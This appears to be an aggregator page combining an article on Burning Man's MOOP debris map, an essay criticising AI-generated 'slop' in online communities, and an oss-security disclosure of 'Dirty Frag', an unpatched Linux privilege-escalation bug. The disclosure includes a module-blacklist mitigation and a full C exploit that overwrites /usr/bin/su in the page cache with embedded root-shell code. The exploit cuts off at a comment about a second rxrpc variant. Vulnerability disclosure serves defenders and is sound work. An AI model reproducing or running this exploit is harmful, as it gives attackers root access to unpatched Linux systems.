10 interesting stories served every morning and every evening.

The map that keeps Burning Man honest

www.not-ship.com

At the end of April, I ran a short cam­paign to find 15 more pay­ing mem­bers of Not-Ship. And we did it! Thank you to the won­der­ful souls who chose to back this work. It means the world to me.

💙 Amanda

Each year, 70,000 peo­ple gather on a dry lakebed in Nevada to build a city from scratch. This is Black Rock City, home to the in­fa­mous Burning Man event. Eight days later, it’s gone.

But 150 people remain. They line up — side by side, an arm’s width apart — and slowly walk the 3,800 acres (15.4 km²) of dusty playa. They’re looking for MOOP: Matter Out of Place. A screw, a sequin, a cigarette butt.

This foren­sic-style sweep takes weeks; every­thing they find is re­moved and logged. At the end, they’re left with a re­mark­able ac­count­ing of what 70,000 peo­ple left be­hind: The MOOP Map. And I’m ob­sessed.

The Burning Man 2025 MOOP Map

Indicates ef­fort and time spent on MOOP cleanup across Black Rock City.

The map is colour-coded by severity of cleanup. Yellow indicates moderate MOOP conditions, where crews slow their pace to make sure nothing is missed. Red marks the zones most heavily affected — difficult enough to stop progress entirely.

“In simple terms, the MOOPier an area is, the more labour and field time it takes to clean until crews are no longer finding debris,” Dominic Tinio, who goes by DA, explained to me. As Burning Man’s Environmental Restoration Manager, he’s in charge of the MOOP process.

The fu­ture of the com­mu­nity de­pends on get­ting this right. Black Rock City is only al­lowed to re­turn to the playa each year if it passes a strict post-event in­spec­tion from the Bureau of Land Management (BLM): No more than one square foot of de­bris can re­main per acre (0.23 m²/​ha).

Average yearly de­bris found by the MOOP, 2006 to 2025

The BLM tests the playa at 120 points across the site; no more than 12 can ex­ceed the one square foot per acre limit. In most years, Burning Man passes com­fort­ably — but not al­ways. In 2023, 11 of those 120 tests came back over the thresh­old, the clos­est the event has come to fail­ing in re­cent mem­ory.

During cleanup, the MOOP team also doc­u­ments what kind of de­bris they find. In 2025, lag bolts were by far the biggest prob­lem. They an­chor tents, art pieces, and other in­fra­struc­ture into the ground, and can eas­ily dis­ap­pear be­neath the dust.

Lots of lag bolts, not many cig­a­rette butts

Types of de­bris found dur­ing the 2025 MOOP.

Since the MOOP is so metic­u­lous, the team can de­ter­mine whether de­bris prob­lems are wide­spread or iso­lated. For lag bolts? There’s no main cul­prit; every­one is just miss­ing a few.

“The MOOP Map is about shared responsibility in our use of the land,” said DA. “In addition to helping uphold the BLM standards, it helps participants, camps, and art projects understand their impact.”

Groups in MOOP-heavy ar­eas re­ceive a break­down of what was found on their foot­print, with the hope they will im­prove the fol­low­ing year. Persistent or se­ri­ous of­fend­ers are flagged to the team re­spon­si­ble for as­sign­ing camps their fu­ture spots in Black Rock City.

And while it’s not the MOOP Map’s aim, its release inevitably fuels a bit of public finger-pointing. The “MOOP Map shame thread” on Reddit calls out individual camps that perform poorly.

The MOOP Map has been around for two decades. Over that time, the data show a relatively clear picture. “Since 2006, over the long arc of the MOOP Map, the most striking trend is that the community has steadily improved at Leave No Trace, even as Black Rock City has grown dramatically in size, complexity, and population,” says DA.

MOOP per per­son peaked in 2010

Debris per 10,000 peo­ple, 2006 to 2025.

Leave No Trace is one of Burning Man’s ten guid­ing prin­ci­ples. Principles are easy to de­clare. But the MOOP Map makes it some­thing the com­mu­nity ac­tu­ally has to face. After 20 years, DA is con­fi­dent it’s work­ing.

“The strongest effect of the MOOP Map is that it drives improvement. Year after year, the community adjusts, learns, and returns better prepared to leave no trace.”

KEEP ON KEEPING ON

While the Not-Ship member drive is over (for now), this work continues to run on reader support. But after two weeks of writing “pay if you love this work” emails, I’m tired. All my pitches have been pitched. So I’ll just leave the button here, and trust you know what to do with it.

FROM ELSEWHERE

Here’s what I found in­ter­est­ing, im­por­tant or de­light­ful this week:

Marblelous music. Wintergatan’s Marble Machine is a quirky instrument that relies heavily on marbles to make music. It’s beautiful to watch, and doesn’t sound anything like you expect.

The in­fi­nite buf­falo sen­tence. It’s a gram­mat­i­cally cor­rect sen­tence, us­ing just the word buf­falo. The video ex­pla­na­tion ben­e­fits from some use­ful vi­su­als, but you’ll still prob­a­bly hate this. Or ab­solutely love it. There’s def­i­nitely no mid­dle ground here.

MORE NOT-SHIP

Banks are fund­ing cli­mate chaos. You don’t have to.

Switching banks could be one of the most cli­mate-friendly de­ci­sions you make.

Not-Ship · Amanda Shendruk

When do most peo­ple have the day off?

It’s not the day you think.

Not-Ship · Amanda Shendruk

Birds might help us get through this

The mental health benefits of “joy watching” are what we need right now.

Not-Ship · Amanda Shendruk

AI Slop is Killing Online Communities

rmoff.net

Like a young child com­ing home from kinder­garten with their lat­est crayon scrawls, the in­ter­net is cur­rently awash with peo­ple shar­ing their AI-generated work. And just like the young child’s draw­ings, much of that work should be proudly put up on the walls within the artist’s house—and no fur­ther.

Prologue: I ❤️ AI

It’s just that I know when to keep my crayon-draw­ings to my­self ;) And I am get­ting in­creas­ingly sad and frus­trated see­ing com­mu­ni­ties that I value slowly wilt­ing un­der the on­slaught of shit. Often that shit is per­haps naïvely shared with no dele­te­ri­ous in­tent, but shit nonethe­less it is.

Congratulations, you entered a prompt and pressed return.

“I rewrote Kafka in COBOL”

Great, en­ter it at your next sci­ence fair. Meanwhile stop beg­ging for stars on your brand new GitHub repo that no-one’s touch­ing with a barge­pole.

“I wrote a blog post about Kafka”

Did you though? We can tell that Claude wrote it, and it’s a piece of garbage.

“I made this video about Kafka”

Cool story bro. Except AI made it, and it’s only of in­ter­est as a cu­rios­ity, not a use­ful learn­ing arte­fact.

“I’m self-publishing an ebook that I wrote about Kafka”

What you mean is, you got Claude to scrape the internet and crap out a “book” that you should be ashamed to give away for free.

Any fool can feed coins into a fruit ma­chine and pull the arm.

Step 0: Profit

The pat­tern I see over and over seems to be:

Step 1: Discover agentic coding. Mind blown.

Step 2: Chuck a project up onto GitHub (if it’s actually up </snark>).

Step 3: Have AI write a breathless blog post about your vibe-coded project. Share blog post and repo to any subreddit and Slack group that you can find. Not sure which is suitable? Post to all of them—people will love to see it! /s

Let me tell you now: pause after step 2. Take a really long breath. Think really hard about what you’ve created, and why you want to share it. If it’s “because it’s cool” then I’ve got news for you: agentic coding is no longer a novelty. It’s just how shit gets done now.

If you can think of the prompt, AI can write it. Big deal. That’s so early-2026. Move on.

Still want to share it far and wide? Is it ac­tu­ally use­ful? Are you us­ing it? Has it got re­ally good doc­u­men­ta­tion? Is it us­able? Have you ac­tu­ally come back to the code again and again and put it through its paces? Or was it a one-night stand with Claude and the next morn­ing nei­ther of you thinks it was such a good idea?

Still want to share it? If it’s soft­ware, are you pre­pared to stand be­hind it as some­thing peo­ple will raise is­sues against, maybe sub­mit PRs for? If it’s writ­ten, is it some­thing you’d want to read? Is it ac­tu­ally adding to the cu­mu­la­tive un­der­stand­ing of the com­mu­nity, or is it just an LLM auto-com­plet­ing its way through text that you can’t be ar­sed to write and I can’t be ar­sed to read?

Who cares?

No one forces me to read this stuff. Why am I so both­ered by it?

Because like bindweed, it’s slowly stran­gling the or­ganic life out of com­mu­ni­ties. When I open up Reddit now, it’s in­creas­ingly over­run with vibe-coded AI stuff. Whilst much of it is well-in­ten­tioned I’m sure, it does noth­ing to con­tribute to the com­mu­nity.

AI slop is dri­ving up the noise, and mak­ing the sig­nal more and more dif­fi­cult to dis­cern in com­mu­ni­ties. This risks be­com­ing a down­ward spi­ral; as com­mu­ni­ties be­come more pol­luted by this stuff, mem­bers will get frus­trated from wad­ing through AI slop and draw back, thus di­min­ish­ing the life of the or­ganic com­mu­nity even fur­ther.

Carrying on like this, online communities will either wither and die, or converge on something like the dystopian-but-banal MoltBook in which AI agents “talk” to each other with no humans present.

There’s ‘good slop’ and bad slop

You may have no­ticed that AI Slop has be­come the mot du jour.

The broad use of the term that I’m generally familiar with is as a negative description for low-effort material created by AI and foisted upon those to whom it is of no benefit. However I learnt recently that there are those—probably correlating strongly with the AI-hating crowd—who brand anything written about AI as “AI Slop”, even if not written by AI.

Material cre­ated with the as­sis­tance of AI is not bad in it­self. It’s the pur­pose to which it’s put.

A good use of AI is when it en­ables peo­ple to do some­thing they could­n’t do be­fore, to con­tribute to a com­mu­nity when they could­n’t be­fore. Done with the care and good in­tent of a hu­man be­hind it, this is a nett pos­i­tive.

Bad AI slop, on the other hand, is mon­keys throw­ing crap over the fence for a pur­pose other than fur­ther­ing the com­mu­nity. This in­cludes spam, en­gage­ment farm­ing, and sim­ply thought­less noise in a space which is not for that pur­pose.

OK, but who made you gatekeeper of the internet?

The stan­dards of com­mon de­cency and taste, that’s who.

Let’s take a step back. Sharing con­tent on­line is won­der­ful. It’s pretty much what made the in­ter­net what it is to­day.

The knack is to un­der­stand what you’re shar­ing, to whom, and why.

If you were born be­fore around 1980 you’ll know that there was the Geocities era. Every high-school nerd had a home­page (mine was in Vienna since you’re ask­ing).

Just because I built a homepage on Geocities, complete with ‘Under Construction’ anigifs, a web counter and a web ring banner, does not mean that I should be sharing it to anyone who’ll listen. Amongst my friends, sure. My parents, of course—they’ll be proud of anything I build. But to the general internet? Who cares.

And now with AI-generated con­tent, whether a vibe-coded app or a blog post, the same ap­plies. The in­ter­net went through a col­lec­tive con­vul­sion in early 2026 as every­one dis­cov­ered the power of Claude Opus 4.5 (and don’t get me wrong, it is damn cool). And what does any­one do when they dis­cover any­thing neat? They want to share it with their friends!

Combine that with the deaf­en­ing AI-hype ma­chine of grifters al­ready in over­drive—and sud­denly sub­red­dits and Slacks are over­run with AI-generated ma­te­r­ial.

Built with AI, not by AI

This ex­cel­lent sec­tion head­ing is taken from my friend and col­league Gunnar Morling’s re­cent ar­ti­cle. As I out­lined above, AI is a pow­er­ful tool, and I will ar­gue with any­one for the case that it’s pretty much a dere­lic­tion of one’s job to not be in­clud­ing it in one’s tool­box. Gunnar nails the nu­ance though:

Build with AI.

AI is just a tool.

You need to do the think­ing, the in­struct­ing, the check­ing.

Gunnar has built a fantastic new project (Hardwood, a new parser for Apache Parquet), using AI. Does that mean it falls foul of my wrath and judgement? No, of course not. It’s a project that’s taken four months so far, with a solid roadmap, a burgeoning community, and a thoughtful and careful design behind it.

Contribution

Does your of­fer­ing con­tribute any­thing to the com­mu­nity?

If you boil it down to its es­sen­tials, is what you’re shar­ing any­thing other than the man­i­fes­ta­tion of a prompt fed into an agen­tic cod­ing tool? If I took your prompt and ran it, would I end up with some­thing sim­i­lar? Prompt en­gi­neer­ing is fun and an in­ter­est­ing study, but it’s tan­gen­tial to the sub­ject it­self. Consider a com­mu­nity of or­nate fur­ni­ture en­thu­si­asts (I’m sure such a thing ex­ists); it’s the equiv­a­lent of bom­bard­ing them with Ikea-esque pieces sim­ply be­cause you’ve got a re­ally in­ter­est­ing set of chis­els that you want to show off.

Just like I’m not posting my kid’s drawings off to the National Gallery just yet, I’m also not sharing every cool app that I can build with Claude. Not that “software is art” (though some of the best actually is), but there’s nothing much interesting in the puerile output of a process. Anyone with a few tokens can prompt their way to a bit of software. Throwaway tools are just fine. They’re great, in fact—the internet is built on weird little scripts that people have built and shared. But chuck them on gist/GitHub—they don’t need a launch blog post as if you’re the incarnation of Steve Jobs.

This is a tale as old as time. Well, the in­ter­net any­way, once it got be­yond ARPANET and BBSes.

Whether Usenet, Reddit, lobste.rs, or any other online platform, the netiquette is always to “lurk”. Hang around, read what gets written, get a feel for the “vibe”.

I’m not the ar­biter of what’s ac­cept­able in a given com­mu­nity. The com­mu­nity mem­bers are. Vibed an amaz­ing new im­ple­men­ta­tion of the Kafka pro­to­col, but not sure if peo­ple want to see it? Read the room, and get a feel for whether they’ll wel­come with open arms your AI slop—or not. If in doubt, ask!

As well as lurk­ing, an­other way of show­ing re­spect to the com­mu­nity is to be very open and clear about if, how, and where you’re us­ing AI in your con­tri­bu­tion.

The Asymmetry of Bullshit

What’s the im­pact on oth­ers of your con­tri­bu­tion?

The amount of energy needed to refute bullshit is an order of magnitude bigger than that needed to produce it.

If you splurge out a gob­blede­gook ar­ti­cle, you’re putting that work­load onto your reader to re­alise that it’s not worth wad­ing through. If you dump a com­plex PR into a pro­ject with­out due care, you’re oblig­at­ing the re­view­ers to go through the code and for them to ex­plain to you why it can’t be merged. In both of these sce­nar­ios the com­mu­nity would be bet­ter off with­out your con­tri­bu­tion.

Pre-AI, the ef­fort re­quired for con­tri­bu­tions was suf­fi­cient proof of work to ei­ther de­ter peo­ple or demon­strate an ac­tual com­mit­ment. Communities could deal with sub-par con­tri­bu­tions. Those well-in­ten­tioned and will­ing to learn could be men­tored and of­ten would de­velop into im­por­tant mem­bers of the com­mu­nity. Those less well-in­ten­tioned and not do­ing much more than spam­ming could be dealt with be­cause the vol­ume was so low.

With great power…

or perhaps that should be “With a great number of tokens”

Communities are pow­er­ful yet frag­ile things. Don’t be the bindweed that suf­fo­cates the life out of them.

Explore with great joy the power that LLMs and agentic coding tools bring. Enjoy the frisson of “jfc that is cool” that it invariably brings.

But re­spect the com­mu­nity, and only share what is truly rel­e­vant. Save the crayon pic­tures for your kitchen fridge.

Bindweed photo by Joshua Ralph on Unsplash.

All other pictures by my kids. Which is ironic, given my exhorting people to literally keep their childish drawings to themselves ;)

security - Dirty Frag: Universal Linux LPE

www.openwall.com


Message-ID: <afzgS2SCWNcZU3vU@v4bel>
Date: Fri, 8 May 2026 03:56:11 +0900
From: Hyunwoo Kim <imv4bel@…il.com>
To: oss-security@…ts.openwall.com
Cc: imv4bel@…il.com
Subject: Dirty Frag: Universal Linux LPE

Hi,

This is a report on “Dirty Frag”, a universal LPE that allows obtaining root privileges on all major distributions.

This vul­ner­a­bil­ity has a sim­i­lar im­pact to the pre­vi­ous Copy Fail.

Because the em­bargo has now been bro­ken, no patches or CVEs ex­ist for these vul­ner­a­bil­i­ties. After con­sul­ta­tion with the linux-dis­tros@…open­wall.org main­tain­ers, and at the main­tain­ers’ re­quest, I am pub­licly re­leas­ing this Dirty Frag doc­u­ment.

As with the pre­vi­ous Copy Fail vul­ner­a­bil­ity, Dirty Frag like­wise al­lows im­me­di­ate root priv­i­lege es­ca­la­tion on all ma­jor dis­tri­b­u­tions, and it chains two sep­a­rate vul­ner­a­bil­i­ties:

- https://git.kernel.org/pub/scm/linux/kernel/git/netdev/net.git/commit/?id=f4c50a4034e62ab75f1d5cdd191dd5f9c77fdff4
- https://lore.kernel.org/all/afKV2zGR6rrelPC7@v4bel/

Because the responsible disclosure schedule and embargo have been broken, no patches exist for any distribution. Use the following command to remove the modules in which the vulnerabilities occur:

```sh
sh -c "printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; true"
```

For de­tailed tech­ni­cal in­for­ma­tion about the vul­ner­a­bil­i­ties and the rea­son the em­bargo was bro­ken, please check https://​dirtyfrag.io.

Full exploit code:

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <sched.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/uio.h>
#include <sys/ioctl.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <net/if.h>
#include <linux/if.h>
#include <linux/netlink.h>
#include <linux/rtnetlink.h>
#include <linux/xfrm.h>

#ifndef UDP_ENCAP
#define UDP_ENCAP 100
#endif
#ifndef UDP_ENCAP_ESPINUDP
#define UDP_ENCAP_ESPINUDP 2
#endif
#ifndef SOL_UDP
#define SOL_UDP 17
#endif

#define ENC_PORT 4500
#define SEQ_VAL 200
#define REPLAY_SEQ 100
#define TARGET_PATH "/usr/bin/su"
#define PATCH_OFFSET 0    /* overwrite whole ELF starting at file[0] */
#define PAYLOAD_LEN 192   /* bytes of shell_elf to write (48 triggers) */
#define ENTRY_OFFSET 0x78 /* shellcode entry inside the new ELF */

/*
 * 192-byte minimal x86_64 root-shell ELF.
 * _start at 0x400078:
 *   setgid(0); setuid(0); setgroups(0, NULL);
 *   execve("/bin/sh", NULL, ["TERM=xterm", NULL]);
 * PT_LOAD covers 0xb8 bytes (the actual content) at vaddr 0x400000 R+X.
 *
 * Setting TERM in the new shell's env silences the
 * "tput: No value for $TERM" / "test: : integer expected" noise
 * /etc/bash.bashrc and friends emit when TERM is unset.
 *
 * Code (from offset 0x78):
 *   31 ff                 xor edi, edi
 *   31 f6                 xor esi, esi
 *   31 c0                 xor eax, eax
 *   b0 6a                 mov al, 0x6a  ; setgid
 *   0f 05                 syscall
 *   b0 69                 mov al, 0x69  ; setuid
 *   0f 05                 syscall
 *   b0 74                 mov al, 0x74  ; setgroups
 *   0f 05                 syscall
 *   6a 00                 push 0        ; envp[1] = NULL
 *   48 8d 05 12 00 00 00  lea rax, [rip+0x12]  ; rax = "TERM=xterm"
 *   50                    push rax      ; envp[0]
 *   48 89 e2              mov rdx, rsp  ; rdx = envp
 *   48 8d 3d 12 00 00 00  lea rdi, [rip+0x12]  ; rdi = "/bin/sh"
 *   31 f6                 xor esi, esi  ; rsi = NULL (argv)
 *   6a 3b 58              push 0x3b ; pop rax  ; rax = 59 (execve)
 *   0f 05                 syscall       ; execve("/bin/sh", NULL, envp)
 * "TERM=xterm\0" (offset 0xa5..0xaf)
 * "/bin/sh\0"    (offset 0xb0..0xb7)
 */
static const uint8_t shell_elf[PAYLOAD_LEN] = {
    0x7f,0x45,0x4c,0x46,0x02,0x01,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x02,0x00,0x3e,0x00,0x01,0x00,0x00,0x00,0x78,0x00,0x40,0x00,0x00,0x00,0x00,0x00,
    0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0x40,0x00,0x38,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x01,0x00,0x00,0x00,0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,
    0xb8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xb8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x31,0xff,0x31,0xf6,0x31,0xc0,0xb0,0x6a,
    0x0f,0x05,0xb0,0x69,0x0f,0x05,0xb0,0x74,0x0f,0x05,0x6a,0x00,0x48,0x8d,0x05,0x12,
    0x00,0x00,0x00,0x50,0x48,0x89,0xe2,0x48,0x8d,0x3d,0x12,0x00,0x00,0x00,0x31,0xf6,
    0x6a,0x3b,0x58,0x0f,0x05,0x54,0x45,0x52,0x4d,0x3d,0x78,0x74,0x65,0x72,0x6d,0x00,
    0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
};

extern int g_su_verbose;
int g_su_verbose = 0;
#define SLOG(fmt, ...) do { \
    if (g_su_verbose) fprintf(stderr, "[su] " fmt "\n", ##__VA_ARGS__); \
} while (0)

static int write_proc(const char *path, const char *buf)
{
    int fd = open(path, O_WRONLY);
    if (fd < 0)
        return -1;
    int n = write(fd, buf, strlen(buf));
    close(fd);
    return n;
}

static void setup_userns_netns(void)
{
    uid_t real_uid = getuid();
    gid_t real_gid = getgid();

    if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) {
        SLOG("unshare: %s", strerror(errno));
        exit(1);
    }
    write_proc("/proc/self/setgroups", "deny");

    char map[64];
    snprintf(map, sizeof(map), "0 %u 1", real_uid);
    if (write_proc("/proc/self/uid_map", map) < 0) {
        SLOG("uid_map: %s", strerror(errno));
        exit(1);
    }
    snprintf(map, sizeof(map), "0 %u 1", real_gid);
    if (write_proc("/proc/self/gid_map", map) < 0) {
        SLOG("gid_map: %s", strerror(errno));
        exit(1);
    }

    int s = socket(AF_INET, SOCK_DGRAM, 0);
    if (s < 0) {
        SLOG("socket: %s", strerror(errno));
        exit(1);
    }
    struct ifreq ifr;
    memset(&ifr, 0, sizeof(ifr));
    strncpy(ifr.ifr_name, "lo", IFNAMSIZ);
    if (ioctl(s, SIOCGIFFLAGS, &ifr) < 0) {
        SLOG("SIOCGIFFLAGS: %s", strerror(errno));
        exit(1);
    }
    ifr.ifr_flags |= IFF_UP | IFF_RUNNING;
    if (ioctl(s, SIOCSIFFLAGS, &ifr) < 0) {
        SLOG("SIOCSIFFLAGS: %s", strerror(errno));
        exit(1);
    }
    close(s);
}

static void put_attr(struct nlmsghdr *nlh, int type, const void *data, size_t len)
{
    struct rtattr *rta = (struct rtattr *)((char *)nlh + NLMSG_ALIGN(nlh->nlmsg_len));
    rta->rta_type = type;
    rta->rta_len = RTA_LENGTH(len);
    memcpy(RTA_DATA(rta), data, len);
    nlh->nlmsg_len = NLMSG_ALIGN(nlh->nlmsg_len) + RTA_ALIGN(rta->rta_len);
}

static int add_xfrm_sa(uint32_t spi, uint32_t patch_seqhi)
{
    int sk = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM);
    if (sk < 0)
        return -1;
    struct sockaddr_nl nl = { .nl_family = AF_NETLINK };
    if (bind(sk, (struct sockaddr *)&nl, sizeof(nl)) < 0) {
        close(sk);
        return -1;
    }

    char buf[4096] = {0};
    struct nlmsghdr *nlh = (struct nlmsghdr *)buf;
    nlh->nlmsg_type = XFRM_MSG_NEWSA;
    nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;
    nlh->nlmsg_pid = getpid();
    nlh->nlmsg_seq = 1;
    nlh->nlmsg_len = NLMSG_LENGTH(sizeof(struct xfrm_usersa_info));

    struct xfrm_usersa_info *xs = (struct xfrm_usersa_info *)NLMSG_DATA(nlh);
    xs->id.daddr.a4 = inet_addr("127.0.0.1");
    xs->id.spi = htonl(spi);
    xs->id.proto = IPPROTO_ESP;
    xs->saddr.a4 = inet_addr("127.0.0.1");
    xs->family = AF_INET;
    xs->mode = XFRM_MODE_TRANSPORT;
    xs->replay_window = 0;
    xs->reqid = 0x1234;
    xs->flags = XFRM_STATE_ESN;
    xs->lft.soft_byte_limit = (uint64_t)-1;
    xs->lft.hard_byte_limit = (uint64_t)-1;
    xs->lft.soft_packet_limit = (uint64_t)-1;
    xs->lft.hard_packet_limit = (uint64_t)-1;
    xs->sel.family = AF_INET;
    xs->sel.prefixlen_d = 32;
    xs->sel.prefixlen_s = 32;
    xs->sel.daddr.a4 = inet_addr("127.0.0.1");
    xs->sel.saddr.a4 = inet_addr("127.0.0.1");

    {
        char alg_buf[sizeof(struct xfrm_algo_auth) + 32];
        memset(alg_buf, 0, sizeof(alg_buf));
        struct xfrm_algo_auth *aa = (struct xfrm_algo_auth *)alg_buf;
        strncpy(aa->alg_name, "hmac(sha256)", sizeof(aa->alg_name) - 1);
        aa->alg_key_len = 32 * 8;
        aa->alg_trunc_len = 128;
        memset(aa->alg_key, 0xAA, 32);
        put_attr(nlh, XFRMA_ALG_AUTH_TRUNC, alg_buf, sizeof(alg_buf));
    }
    {
        char alg_buf[sizeof(struct xfrm_algo) + 16];
        memset(alg_buf, 0, sizeof(alg_buf));
        struct xfrm_algo *ea = (struct xfrm_algo *)alg_buf;
        strncpy(ea->alg_name, "cbc(aes)", sizeof(ea->alg_name) - 1);
        ea->alg_key_len = 16 * 8;
        memset(ea->alg_key, 0xBB, 16);
        put_attr(nlh, XFRMA_ALG_CRYPT, alg_buf, sizeof(alg_buf));
    }
    {
        struct xfrm_encap_tmpl enc;
        memset(&enc, 0, sizeof(enc));
        enc.encap_type = UDP_ENCAP_ESPINUDP;
        enc.encap_sport = htons(ENC_PORT);
        enc.encap_dport = htons(ENC_PORT);
        enc.encap_oa.a4 = 0;
        put_attr(nlh, XFRMA_ENCAP, &enc, sizeof(enc));
    }
    {
        char esn_buf[sizeof(struct xfrm_replay_state_esn) + 4];
        memset(esn_buf, 0, sizeof(esn_buf));
        struct xfrm_replay_state_esn *esn = (struct xfrm_replay_state_esn *)esn_buf;
        esn->bmp_len = 1;
        esn->oseq = 0;
        esn->seq = REPLAY_SEQ;
        esn->oseq_hi = 0;
        esn->seq_hi = patch_seqhi;
        esn->replay_window = 32;
        put_attr(nlh, XFRMA_REPLAY_ESN_VAL, esn_buf, sizeof(esn_buf));
    }

    if (send(sk, nlh, nlh->nlmsg_len, 0) < 0) {
        close(sk);
        return -1;
    }
    char rbuf[4096];
    int n = recv(sk, rbuf, sizeof(rbuf), 0);
    if (n < 0) {
        close(sk);
        return -1;
    }
    struct nlmsghdr *rh = (struct nlmsghdr *)rbuf;
    if (rh->nlmsg_type == NLMSG_ERROR) {
        struct nlmsgerr *e = NLMSG_DATA(rh);
        if (e->error) {
            close(sk);
            return -1;
        }
    }
    close(sk);
    return 0;
}

static int do_one_write(const char *path, off_t offset, uint32_t spi)
{
    int sk_recv = socket(AF_INET, SOCK_DGRAM, 0);
    if (sk_recv < 0)
        return -1;
    int one = 1;
    setsockopt(sk_recv, SOL_SOCKET, SO_REUSEADDR, &one, sizeof(one));
    struct sockaddr_in sa_d = {
        .sin_family = AF_INET,
        .sin_port = htons(ENC_PORT),
        .sin_addr = { inet_addr("127.0.0.1") },
    };
    if (bind(sk_recv, (struct sockaddr *)&sa_d, sizeof(sa_d)) < 0) {
        close(sk_recv);
        return -1;
    }
    int encap = UDP_ENCAP_ESPINUDP;
    if (setsockopt(sk_recv, IPPROTO_UDP, UDP_ENCAP, &encap, sizeof(encap)) < 0) {
        close(sk_recv);
        return -1;
    }
    int sk_send = socket(AF_INET, SOCK_DGRAM, 0);
    if (sk_send < 0) {
        close(sk_recv);
        return -1;
    }
    if (connect(sk_send, (struct sockaddr *)&sa_d, sizeof(sa_d)) < 0) {
        close(sk_send);
        close(sk_recv);
        return -1;
    }
    int file_fd = open(path, O_RDONLY);
    if (file_fd < 0) {
        close(sk_send);
        close(sk_recv);
        return -1;
    }

    int pfd[2];
    if (pipe(pfd) < 0) {
        close(file_fd);
        close(sk_send);
        close(sk_recv);
        return -1;
    }

    uint8_t hdr[24];
    *(uint32_t *)(hdr + 0) = htonl(spi);
    *(uint32_t *)(hdr + 4) = htonl(SEQ_VAL);
    memset(hdr + 8, 0xCC, 16);

    struct iovec iov_h = { .iov_base = hdr, .iov_len = sizeof(hdr) };
    if (vmsplice(pfd[1], &iov_h, 1, 0) != (ssize_t)sizeof(hdr)) {
        close(file_fd); close(pfd[0]); close(pfd[1]);
        close(sk_send); close(sk_recv);
        return -1;
    }
    off_t off = offset;
    ssize_t s = splice(file_fd, &off, pfd[1], NULL, 16, SPLICE_F_MOVE);
    if (s != 16) {
        close(file_fd); close(pfd[0]); close(pfd[1]);
        close(sk_send); close(sk_recv);
        return -1;
    }
    s = splice(pfd[0], NULL, sk_send, NULL, 24 + 16, SPLICE_F_MOVE);
    /* still proceed regardless of splice rc - kernel may have already
     * decrypted the page in the time between splice and recv */
    usleep(150 * 1000);

    close(file_fd);
    close(pfd[0]);
    close(pfd[1]);
    close(sk_send);
    close(sk_recv);
    return s == 40 ? 0 : -1;
}

static int verify_byte(const char *path, off_t offset, uint8_t want)
{
    int fd = open(path, O_RDONLY);
    if (fd < 0)
        return -1;
    uint8_t got;
    if (pread(fd, &got, 1, offset) != 1) {
        close(fd);
        return -1;
    }
    close(fd);
    return got == want ? 0 : -1;
}

static int corrupt_su(void)
{
    setup_userns_netns();
    usleep(100 * 1000);

    /* Install 48 xfrm SAs, one per 4-byte chunk. Each carries the
     * desired payload word in its seq_hi field. */
    for (int i = 0; i < PAYLOAD_LEN / 4; i++) {
        uint32_t spi = 0xDEADBE10 + i;
        uint32_t seqhi = ((uint32_t)shell_elf[i*4 + 0] << 24) |
                         ((uint32_t)shell_elf[i*4 + 1] << 16) |
                         ((uint32_t)shell_elf[i*4 + 2] << 8)  |
                         ((uint32_t)shell_elf[i*4 + 3]);
        if (add_xfrm_sa(spi, seqhi) < 0) {
            SLOG("add_xfrm_sa #%d failed", i);
            return -1;
        }
    }
    SLOG("installed %d xfrm SAs", PAYLOAD_LEN / 4);

    for (int i = 0; i < PAYLOAD_LEN / 4; i++) {
        uint32_t spi = 0xDEADBE10 + i;
        off_t off = PATCH_OFFSET + i * 4;
        if (do_one_write(TARGET_PATH, off, spi) < 0) {
            SLOG("do_one_write #%d at off=0x%lx failed", i, (long)off);
            return -1;
        }
    }
    SLOG("wrote %d bytes to %s starting at 0x%x", PAYLOAD_LEN, TARGET_PATH, PATCH_OFFSET);
    return 0;
}

int su_lpe_main(int argc, char **argv)
{
    for (int i = 1; i < argc; i++) {
        if (!strcmp(argv[i], "-v") || !strcmp(argv[i], "--verbose"))
            g_su_verbose = 1;
        else if (!strcmp(argv[i], "--corrupt-only"))
            ; /* compat: this body always corrupts only */
    }
    if (getenv("DIRTYFRAG_VERBOSE"))
        g_su_verbose = 1;

    pid_t cpid = fork();
    if (cpid < 0)
        return 1;
    if (cpid == 0) {
        int rc = corrupt_su();
        _exit(rc == 0 ? 0 : 2);
    }
    int cstatus;
    waitpid(cpid, &cstatus, 0);
    if (!WIFEXITED(cstatus) || WEXITSTATUS(cstatus) != 0) {
        SLOG("corruption stage failed (status=0x%x)", cstatus);
        return 1;
    }

    /* Sanity check: bytes at the embedded ELF entry (file offset 0x78
     * after our overwrite) should be 0x31 0xff (xor edi, edi - first
     * instruction of the new shellcode). */
    if (verify_byte(TARGET_PATH, ENTRY_OFFSET, 0x31) != 0 ||
        verify_byte(TARGET_PATH, ENTRY_OFFSET + 1, 0xff) != 0) {
        SLOG("post-write verify failed (target unchanged)");
        return 1;
    }
    SLOG("/usr/bin/su page-cache patched (entry 0x%x = shellcode)", ENTRY_OFFSET);
    return 0;
}

/*
 * rxrpc/rxkad LPE - uid=1000 -> root
 */

